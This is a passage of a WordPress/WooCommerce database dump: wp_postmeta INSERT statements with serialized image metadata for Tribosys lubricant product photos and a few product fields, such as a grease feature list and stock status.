ght";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16199, 1637, '_thumbnail_id', '1650'); 
INSERT INTO `wp_postmeta` VALUES (16200, 1651, '_wp_attached_file', '2016/09/tribosys-high-temperature-chain-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16201, 1651, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:47:"2016/09/tribosys-high-temperature-chain-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:47:"tribosys-high-temperature-chain-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:47:"tribosys-high-temperature-chain-oil-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:47:"tribosys-high-temperature-chain-oil-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:49:"tribosys-high-temperature-chain-oil-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:47:"tribosys-high-temperature-chain-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:47:"tribosys-high-temperature-chain-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:47:"tribosys-high-temperature-chain-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:47:"tribosys-high-temperature-chain-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16202, 1638, '_thumbnail_id', '1651'); 
INSERT INTO `wp_postmeta` VALUES (16203, 1652, '_wp_attached_file', '2016/09/tribosys-gear-box-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16204, 1652, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4800;s:6:"height";i:3200;s:4:"file";s:39:"2016/09/tribosys-gear-box-lubricant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"tribosys-gear-box-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"tribosys-gear-box-lubricant-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"tribosys-gear-box-lubricant-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"tribosys-gear-box-lubricant-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"tribosys-gear-box-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"tribosys-gear-box-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"tribosys-gear-box-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"tribosys-gear-box-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16205, 1643, '_thumbnail_id', '1652'); 
INSERT INTO `wp_postmeta` VALUES (16206, 1653, '_wp_attached_file', '2016/09/tribosys-compressor-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16207, 1653, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5472;s:6:"height";i:3648;s:4:"file";s:41:"2016/09/tribosys-compressor-lubricant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:41:"tribosys-compressor-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:41:"tribosys-compressor-lubricant-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:41:"tribosys-compressor-lubricant-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:43:"tribosys-compressor-lubricant-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:41:"tribosys-compressor-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:41:"tribosys-compressor-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:41:"tribosys-compressor-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:41:"tribosys-compressor-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16208, 1644, '_thumbnail_id', '3282'); 
INSERT INTO `wp_postmeta` VALUES (16209, 1654, '_wp_attached_file', '2016/09/tribosys-hydraulic-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16210, 1654, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:34:"2016/09/tribosys-hydraulic-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"tribosys-hydraulic-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"tribosys-hydraulic-oil-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"tribosys-hydraulic-oil-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"tribosys-hydraulic-oil-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"tribosys-hydraulic-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"tribosys-hydraulic-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"tribosys-hydraulic-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"tribosys-hydraulic-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16211, 1645, '_thumbnail_id', '1654'); 
INSERT INTO `wp_postmeta` VALUES (16212, 1655, '_wp_attached_file', '2016/09/tribosys-chain-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16213, 1655, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5472;s:6:"height";i:3648;s:4:"file";s:30:"2016/09/tribosys-chain-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"tribosys-chain-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"tribosys-chain-oil-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"tribosys-chain-oil-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:32:"tribosys-chain-oil-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:30:"tribosys-chain-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:30:"tribosys-chain-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:30:"tribosys-chain-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:30:"tribosys-chain-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16214, 1646, '_thumbnail_id', '1655'); 
INSERT INTO `wp_postmeta` VALUES (16215, 1656, '_wp_attached_file', '2016/09/tribosys-food-grade.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16216, 1656, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4288;s:6:"height";i:2848;s:4:"file";s:31:"2016/09/tribosys-food-grade.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"tribosys-food-grade-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"tribosys-food-grade-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"tribosys-food-grade-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"tribosys-food-grade-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"tribosys-food-grade-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"tribosys-food-grade-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"tribosys-food-grade-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"tribosys-food-grade-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16217, 1649, '_thumbnail_id', '1656'); 
INSERT INTO `wp_postmeta` VALUES (16218, 1658, '_wp_attached_file', '2016/09/tribosys-general-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16219, 1658, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4368;s:6:"height";i:2912;s:4:"file";s:35:"2016/09/tribosys-general-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"tribosys-general-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"tribosys-general-grease-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"tribosys-general-grease-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:37:"tribosys-general-grease-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"tribosys-general-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"tribosys-general-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"tribosys-general-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"tribosys-general-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16221, 1659, '_wp_attached_file', '2016/09/tribosys-high-temperature-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16222, 1659, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2475;s:6:"height";i:1650;s:4:"file";s:44:"2016/09/tribosys-high-temperature-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:44:"tribosys-high-temperature-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:44:"tribosys-high-temperature-grease-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:44:"tribosys-high-temperature-grease-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:46:"tribosys-high-temperature-grease-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:44:"tribosys-high-temperature-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:44:"tribosys-high-temperature-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:44:"tribosys-high-temperature-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:44:"tribosys-high-temperature-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16223, 1648, '_thumbnail_id', '1659'); 
INSERT INTO `wp_postmeta` VALUES (16224, 1660, '_wp_attached_file', '2016/09/tribosys-industrial.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16225, 1660, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2850;s:6:"height";i:1887;s:4:"file";s:31:"2016/09/tribosys-industrial.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"tribosys-industrial-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"tribosys-industrial-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"tribosys-industrial-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"tribosys-industrial-1600x1059.jpg";s:5:"width";i:1600;s:6:"height";i:1059;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"tribosys-industrial-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"tribosys-industrial-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"tribosys-industrial-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"tribosys-industrial-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16226, 1661, '_wp_attached_file', '2016/09/tribosys-1200-aerosol-krytox.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16227, 1661, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:40:"2016/09/tribosys-1200-aerosol-krytox.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"tribosys-1200-aerosol-krytox-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"tribosys-1200-aerosol-krytox-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"tribosys-1200-aerosol-krytox-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"tribosys-1200-aerosol-krytox-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"tribosys-1200-aerosol-krytox-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"tribosys-1200-aerosol-krytox-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"tribosys-1200-aerosol-krytox-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"tribosys-1200-aerosol-krytox-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16228, 1662, '_edit_lock', '1480363343:2'); 
INSERT INTO `wp_postmeta` VALUES (16229, 1662, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (16230, 1663, '_wp_attached_file', '2016/09/tribosys-110XN-krytox-oil-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16231, 1663, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5107;s:6:"height";i:3600;s:4:"file";s:44:"2016/09/tribosys-110XN-krytox-oil-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:44:"tribosys-110XN-krytox-oil-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:44:"tribosys-110XN-krytox-oil-grease-800x564.jpg";s:5:"width";i:800;s:6:"height";i:564;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:44:"tribosys-110XN-krytox-oil-grease-768x541.jpg";s:5:"width";i:768;s:6:"height";i:541;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:46:"tribosys-110XN-krytox-oil-grease-1600x1128.jpg";s:5:"width";i:1600;s:6:"height";i:1128;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:44:"tribosys-110XN-krytox-oil-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:44:"tribosys-110XN-krytox-oil-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:44:"tribosys-110XN-krytox-oil-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:44:"tribosys-110XN-krytox-oil-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16232, 1662, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16233, 1662, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16234, 1662, '_thumbnail_id', '1663'); 
INSERT INTO `wp_postmeta` VALUES (16235, 1662, '312_default_editor', '<ul>\r\n 	<li>Wide temperature range (-94ºF to 550ºF).</li>\r\n 	<li>Chemically inert.</li>\r\n 	<li>Insoluble in solvents, water, and steam.</li>\r\n 	<li>Compatible with plastics, metal and elastomers.</li>\r\n 	<li>Low outgassing.</li>\r\n 	<li>Low vapor pressure.</li>\r\n 	<li>Safe for use with reactive chemicals.</li>\r\n 	<li>Oxygen compatible</li>\r\n 	<li>Extends service life of critical components.</li>\r\n 	<li>Reduces friction &amp; wear.</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16236, 1662, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16237, 1662, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16238, 1662, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16239, 1662, '317_default_editor', '<ul>\r\n 	<li>8 oz. Aerosol</li>\r\n 	<li>1- Aerosol</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16240, 1662, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16241, 1662, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16242, 1662, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16243, 1662, '_virtual', 'no'); 
